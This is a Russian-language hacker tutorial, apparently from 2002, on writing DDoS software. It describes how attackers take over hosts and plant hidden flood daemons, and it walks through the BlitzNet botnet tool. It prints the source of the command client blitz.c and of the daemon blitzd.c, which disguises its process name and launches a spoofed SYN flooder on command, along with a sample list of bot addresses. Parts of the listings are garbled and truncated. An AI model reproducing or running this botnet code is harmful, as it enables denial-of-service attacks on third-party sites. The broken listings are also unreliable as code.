Новичку полезно

  • А знаете ли вы что?

    - rudvs - чувства, которые не остывают.


Пишем софт для DDoS

:: Intro

DDoS атака (Distributed Denial of Service Attack) - это распределенная атака на отказ в обслуживании. От обычной DoS атаки отличается тем, что в процессе участвует не один компьютер, а множество компьютеров, подчиняющихся командам атакующего.

DDoS атаки относительно новы. Впервые Интернет-общество серьезно столкнулось с ними 7 февраля 2000 года. Тогда в течении недели на несколько часов были выведены из строя такие известные сайты, как Yahoo, Buy.com, eBay, Amazon, Datek, E*Trade и CNN.

Сейчас 2002 год, но DDoS атаки до сих пор практически невозможно отслеживать заранее и предотвращать, и вряд ли это станет возможным в ближайшем будущем.

:: Немного лирики

DDoS атаке предшествуют взломы сотен (а иногда и тысяч) компьютеров, на которые устанавливается специальный DDoS софт, позволяющий проводить координированные DoS атаки (обычно используются flood атаки) на сайты жертв.

В деталях это выглядит следующим образом: атакующий ищет слабо защищенный компьютер, вломиться в который не составляет проблемы. Затем на взломанную систему устанавливается софт, который будет скрывать следы взлома (например, скрывать процесс, запущенный атакующим, чтобы в дальнейшем контролировать данную систему). А потом осуществляется то, ради чего, собственно, система и была взломана: запускается процесс, ожидающий команды из Интернета начать атаку на определенную жертву. После этого адрес захваченного компьютера заносится в базу данных. Все эти шаги достаточно автоматизированы и повторяются до тех пор, пока количество "рабов" не достигнет необходимой атакующему отметки. В итоге получается DDoS сеть, т.е. имеются компьютеры с установленным на них DDoS софтом, а атакующий знает их адреса.

С наступлением часа X атакующий просто запускает программу, которая посылает команды начать атаку на определенную жертву всем захваченным компьютерам по адресам, хранящимся в специальном файле. Когда атакующий решает прекратить DDoS атаку, он опять же просто запускает программу, которая пошлет по тем же адресам команды прекратить безобразие.

 :: c0dez

Рассмотрим DDoS софт на примере BlitzNet by phreeon, написанный частично на Си (если не знаешь Си, смотри "A quick introduction to C - learn programming in one day" Mixter'а), частично на TCL (можешь посмотреть статью Forb'а "Кодинг на TCL", Xakep #030).

BlitzNet (Blitz Network) написан для того, чтобы проводить spoofed syn flood атаку с множества разных компьютеров без логина на них. Дистрибутив включает в себя следующие файлы: blitz.c (клиент), blitzd.c (сервер), rush.tcl, уже скомпилированный spoofed syn flooder (slice2) и README. На взломанную систему помещаются 2 файла: blitzd и slice2. А у атакующего должны быть 4 файла: rush.tcl, shell.list, blitz и strobe (rush.tcl использует blitz для связи c компьютерами, адреса которых находятся в shell.list, а strobe нужен rush.tcl для проверки тех компьютеров). Файл shell.list должен иметь примерно такой вид:

192.9.49.33 31337
199.185.137.3 9999
216.200.201.193 6969

Первая часть строки - ip адрес компьютера, вторая - порт, на котором висит blitzd.

Клиентская часть BlitzNet устанавливает TCP соединение с указанным сервером (argv[1]) по указанному порту (argv[2]) и пересылает демону адрес для подмены адреса компьютера, проводящего атаку, (0 для случайного); адрес жертвы ; нижний предел диапазона атакуемых портов ; верхний предел , продолжительность атаки в секундах и количество одновременно работающих процессов slice2 .

Чтобы установить Интернет соединение, нужно использовать сокеты. Сокеты бывают двух типов: потоковые (TCP) и датаграммные (UDP). Кроме того, сокеты делятся по областям (domain) на сокеты Интернета и сокеты UNIX (локальные). И еще с сокетом ассоциируется определенный протокол. Области и типы определяются числовыми константами, но обычно вместо циферков используются буковки, точнее, символические имена (задаваемые #define). Потоковые сокеты имеют тип SOCK_STREAM, датаграммные - SOCK_DGRAM; области Интернета соответствует константа PF_INET (иногда вместо PF_* используется AF_*), области UNIX - PF_UNIX (в POSIX вместо PF_UNIX используется PF_LOCAL, но PF_UNIX допустима почти всегда, т.к. используется в огромном количестве существующих программ). Протокол система может выбирать автоматически, если функциям сокетов передается значение 0.

Как же написать TCP клиента? Прежде всего, нужно подключить библиотеки, необходимые для работы с сокетами:

#include "sys"
#include "netinet" // Для структуры sockaddr_in
Далее, необходимые переменные:
// Аналог дескриптора файла
int sockfd;
struct sockaddr_in address;
На FreeBSD и, наверное, на всех других NIX системах, эта структура выглядит следующим образом:
/*
* Socket address, internet style.
*/
struct sockaddr_in {
 u_char sin_len;
 u_char sin_family;
 u_short sin_port;
 struct in_addr sin_addr;
 char sin_zero[8];
};

 Интерес представляют поля sin_family (что-то типа области), sin_port (порт) и sin_addr (адрес хоста).
А потом, собственно, подключаемся к сокету на удаленном компьютере:

// Создать сокет
sockfd = socket(AF_INET, SOCK_STREAM, 0);
// Построить адрес удаленного компьютера
bzero(&address, sizeof(saddress)); // Очистка структуры (не обязательно)
address.sin_family = AF_INET;
address.sin_addr.s_addr = inet_addr("host");
address.sin_port = htons(atoi("port"));
// Подключиться
connect(sockfd, (struct sockaddr *)&address, sizeof(address));
// Сделать что-то с сокетом
write(sockfd, ...);
read(sockfd, ...);
// И отключиться после завершения
close(sockfd);

 На Перле написать это куда проще (может, я соберусь и напишу на нем аналог BlitzNet), но знание, как это делается на Си тебе не помешает.
А вот и Blitz клиент:

blitz.c
#include "sys/types.h"
#include "sys/socket.h"
#include "stdio.h"
#include "netinet/in.h"
#include "arpa/inet.h"
#include "unistd.h"
int main(int argc, char *argv[])
{
int i;
int sockfd;
int len;
struct sockaddr_in address;
int result;
char cmd[128];
char ch;
if (argc        \n", argv[0]);
 exit(1);
}
sockfd = socket(AF_INET, SOCK_STREAM, 0);
address.sin_family = AF_INET;
address.sin_addr.s_addr = inet_addr(argv[1]);
address.sin_port = htons(atoi(argv[2]));
len = sizeof(address);
result = connect(sockfd, (struct sockaddr *)&address, len);
if(result == -1) {
 printf("%s->%s: connection refused!\n", argv[1], argv[4]);
 exit(1);
}
sprintf(cmd, "%s %s %s %s %s %s", argv[3], argv[4], argv[5], argv[6], argv[7], argv[8]);
write(sockfd, cmd, sizeof(cmd));
read(sockfd, &ch, 1);
if (ch == '.') {
 printf("%s->%s: successful!\n", argv[1], argv[4]);
}
if (ch == '!') {
 printf("%s->%s: failed!\n", argv[1], argv[4]);
}
if (ch != '.' && ch != '!') {
 printf("%s->%s: unknown!\n", argv[1], argv[4]);
}
close(sockfd);
exit(0);
}

 Серверная часть Blitz Network сначала предпринимает некоторые шаги для маскировки, в частности, забивает все аргументы нулями, а себя маскирует под что-нибудь. Потом происходит непосредственно прием информации, передаваемой клиентом, и запуск slice2 с полученными от клиента аргументами.

Написать типичный TCP сервер не так уж и сложно. Сначала все те же библиотеки, почти те же переменные, так же создаем сокет:

 
...
#include "sys/socket.h"
#include "netinet/in.h"
...
int server_sockfd, client_sockfd;
struct sockaddr_in server_address;
struct sockaddr_in client_address;
...
// Создать сокет
server_sockfd = socket(AF_INET, SOCK_STREAM, 0);
// Заполнение структуры address несколько отличается:
bzero(&server_address, sizeof(server_address));
server_address.sin_family = AF_INET;
server_address.sin_port = htons(atoi("port");
server_address.sin_addr.s_addr = htonl(INADDR_ANY);

 Разница в server_address.sin_addr.s_addr. Вместо адреса определенного хоста используется INADDR_ANY - специальный адрес, означающий "прослушивание на всех интерфейсах".

// Далее вместо connect() используем bind()
bind(server_sockfd, (struct sockaddr *)&server_address, sizeof(server_address));

 Потом процесс сервера создает дочерний процесс, который принимает подключения. Это удобно сделать так:

switch (fork()) {
case -1:
 perror("fork");
 return 3;
 break;
default:
 close(server_sockfd);
 return 0;
 break;
case 0:
 break;
}
// Теперь необходимо установить очередь для входящих сообщений
listen(server_sockfd, 5);

 Числовой аргумент функции listen() определяет количество не принятых функцией accept() подключений, которые будут поставлены в очередь.

// Потом в цикле происходит прием подключений
for (;;) {
 b = sizeof(client_address); // b имеет тип int
 client_sockfd = accept(s, (struct sockaddr *)&client_address, &b);
 // Делаем что-нибудь
 read(client_sockfd, ...);
 write(client_sockfd, ...);
 // И отрубаем
 close(client_sockfd);
}

 Все!

Но blitzd написан каким-то странным способом, в котором я до конца не разобрался. То же самое можно было написать на том же Си куда проще, но я привожу исходник AS IS:

blitzd.c
#include "sys/types.h"
#include "sys/socket.h"
#include "stdio.h"
#include "netinet/in.h"
#include "sys/time.h"
#include "sys/ioctl.h"
#include "unistd.h"
#include "lists.h"
int main(int argc, char *argv[])
{
int x;
char stealth[128];
char good, bad;
time_t timeval;
int server_sockfd, client_sockfd;
int server_len, client_len;
struct sockaddr_in server_address;
struct sockaddr_in client_address;
int result;
fd_set readfds, testfds;
good = '.';
bad = '!';
if (argc = 0; x--) {
memset(argv[x], 0, strlen(argv[x]));
}
strcpy(argv[0], stealth);
server_len = sizeof(server_address);
bind(server_sockfd, (struct sockaddr *)&server_address, server_len);
listen(server_sockfd, 5);
FD_ZERO(&readfds);
FD_SET(server_sockfd, &readfds);
while(1) {
 char cmd[128], realcmd[512];
 int fd;
 int nread;
 testfds = readfds;
 (void)time(&timeval);
 // printf("[%s] server waiting\n", string_range(ctime(&timeval), 0, (strlen(ctime(&timeval))-2)));
 result = select(FD_SETSIZE, &testfds, (fd_set *)0, 
 (fd_set *)0, (struct timeval *) 0);
 if(result  /dev/null &\nsleep %s; kill `pidof slice2`;", lrange(cmd, 0, 4), lindex(cmd, -1));
     write(fd, &good, 1);
     system(realcmd);
     } else {
     write(fd, &bad, 1);
     }
    }
   }
  }
 }
}
}

 На этом все. Листинг rush.tcl я приводить не буду, т.к. особых познаний в TCL не имею, разберись с ним сам, если хочешь. И надеюсь, ты не будешь использовать полученные знания во имя зла >:-F~.

:: Использованная литература

Distributed Denial of Service Attacks by Bennett Todd
Perl: библиотека программиста -> Сокеты
FreeBSD Developers' Handbook -> Chapter 7 Sockets

Источник 

Добавить комментарий


Обновить